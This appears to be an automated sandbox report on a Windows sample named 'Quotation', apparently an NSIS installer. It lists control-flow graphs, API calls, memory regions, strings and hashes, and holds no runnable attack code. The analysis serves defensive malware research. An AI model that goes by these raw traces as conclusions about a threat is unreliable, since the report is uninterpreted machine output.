                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                                                    • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll
                                                                                    • API String ID: 1759915248-1691272624
                                                                                    • Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                                    • Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
                                                                                    • Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                                    • Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 946 403148-403181 947 403190-4031a4 call 406926 946->947 948 403183-40318b call 403131 946->948 952 403357 947->952 953 4031aa-4031b0 947->953 948->947 954 403359 952->954 955 4031b6-4031e0 GetTickCount 953->955 956 4032f9-4032fb 953->956 957 40335a-403364 954->957 960 4032f1-4032f3 955->960 961 4031e6-4031fd call 40311b 955->961 958 403340-403355 call 40311b 956->958 959 4032fd-4032ff 956->959 958->952 958->960 959->960 963 403301 959->963 960->957 961->952 968 403203-403211 961->968 966 403306-403316 call 40311b 963->966 966->952 973 403318-403328 call 4069e9 966->973 970 40321b-403237 call 406e86 968->970 976 4032f5-4032f7 970->976 977 40323d-40325d GetTickCount 970->977 981 40332a-403338 973->981 982 40333c-40333e 973->982 976->954 979 4032aa-4032b0 977->979 980 40325f-403268 977->980 986 4032b2-4032b4 979->986 987 4032e9-4032eb 979->987 984 40326a-40326c 980->984 985 40326e-4032a6 MulDiv wsprintfW call 405d18 980->985 981->966 983 40333a 981->983 982->954 983->960 984->979 984->985 985->979 989 4032b6-4032bf call 4069e9 986->989 990 4032ce-4032d6 986->990 987->960 987->961 995 4032c4-4032c6 989->995 991 4032da-4032e1 990->991 991->970 994 4032e7 991->994 994->960 995->982 996 4032c8-4032cc 995->996 996->991
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004031B6
                                                                                    • GetTickCount.KERNEL32 ref: 00403248
                                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00403278
                                                                                    • wsprintfW.USER32 ref: 00403289
                                                                                      • Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$FilePointerwsprintf
                                                                                    • String ID: ... %d%%$<Py
                                                                                    • API String ID: 999035486-2352372732
                                                                                    • Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                                    • Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
                                                                                    • Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                                    • Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 997 40617c-40619c GetSystemDirectoryW 998 4061b6 997->998 999 40619e-4061a0 997->999 1000 4061b8 998->1000 999->998 1001 4061a2-4061ad 999->1001 1002 4061bd-4061ea wsprintfW LoadLibraryExW 1000->1002 1001->1000 1003 4061af-4061b4 1001->1003 1003->1002
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                    • wsprintfW.USER32 ref: 004061CF
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                    • API String ID: 2200240437-1946221925
                                                                                    • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                    • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                                    • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                    • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1004 406a34-406a40 1005 406a41-406a73 GetTickCount GetTempFileNameW 1004->1005 1006 406a75-406a77 1005->1006 1007 406a7e 1005->1007 1006->1005 1008 406a79-406a7c 1006->1008 1009 406a80-406a83 1007->1009 1008->1009
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00406A50
                                                                                    • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406A6B
                                                                                    Strings
                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
                                                                                    • a, xrefs: 00406A49
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A39
                                                                                    • n, xrefs: 00406A42
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                                                                    • API String ID: 1716503409-3489432095
                                                                                    • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                                    • Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
                                                                                    • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                                    • Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1010 4068c4-4068da GetModuleHandleA 1011 4068e6-4068ee GetProcAddress 1010->1011 1012 4068dc-4068dd call 40617c 1010->1012 1014 4068f4-4068f6 1011->1014 1015 4068e2-4068e4 1012->1015 1015->1011 1015->1014
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                      • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                      • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                                      • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                    • API String ID: 2547128583-890815371
                                                                                    • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                    • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                                    • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                    • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1016 405e1c-405e65 CreateDirectoryW 1017 405e67-405e72 GetLastError 1016->1017 1018 405e8a-405e8c 1016->1018 1019 405e94-405e95 1017->1019 1020 405e74-405e88 SetFileSecurityW 1017->1020 1018->1019 1020->1018 1021 405e8e GetLastError 1020->1021 1021->1019
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
                                                                                    • GetLastError.KERNEL32 ref: 00405E67
                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
                                                                                    • GetLastError.KERNEL32 ref: 00405E8E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                    • String ID:
                                                                                    • API String ID: 3449924974-0
                                                                                    • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                                    • Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
                                                                                    • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                                    • Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1022 406955-406988 call 4062b6 1025 4069c7-4069c9 1022->1025 1026 40698a-4069b9 RegQueryValueExW RegCloseKey 1022->1026 1028 4069cc-4069ce 1025->1028 1026->1025 1027 4069bb-4069bf 1026->1027 1027->1028 1029 4069c1-4069c5 1027->1029 1029->1025 1029->1028
                                                                                    APIs
                                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
                                                                                    • RegCloseKey.KERNELBASE(?), ref: 004069A7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID: Call
                                                                                    • API String ID: 3356406503-1824292864
                                                                                    • Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                                    • Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
                                                                                    • Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                                    • Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1030 405dfc-405e0c CreateDirectoryW 1031 405e16-405e19 1030->1031 1032 405e0e-405e14 GetLastError 1030->1032 1032->1031
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
                                                                                    • GetLastError.KERNEL32 ref: 00405E0E
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DFC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 1375471231-297319885
                                                                                    • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                                    • Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
                                                                                    • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                                    • Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8
                                                                                    APIs
                                                                                      • Part of subcall function 70022351: GlobalFree.KERNEL32(?), ref: 70022A44
                                                                                      • Part of subcall function 70022351: GlobalFree.KERNEL32(?), ref: 70022A4A
                                                                                      • Part of subcall function 70022351: GlobalFree.KERNEL32(?), ref: 70022A50
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70021738
                                                                                    • FreeLibrary.KERNEL32(?), ref: 700217C3
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 700217E9
                                                                                      • Part of subcall function 70021FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 70021FFA
                                                                                      • Part of subcall function 700217F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,70021708,00000000), ref: 7002189A
                                                                                      • Part of subcall function 70021F1E: wsprintfW.USER32 ref: 70021F51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3962662361-0
                                                                                    • Opcode ID: 9ce89e61440179cb6e749ad94ad8171360b05b0ca1aaf4e4cb985fff4bcb6601
                                                                                    • Instruction ID: be55c39df0921b966c114d36cc37567fb3b7bdd9f064ac6c709c36b544e3c3da
                                                                                    • Opcode Fuzzy Hash: 9ce89e61440179cb6e749ad94ad8171360b05b0ca1aaf4e4cb985fff4bcb6601
                                                                                    • Instruction Fuzzy Hash: E841B432404248AED7709F64FC85BDE37FEBBA0B33F204019F94E56252DB756985C650
                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
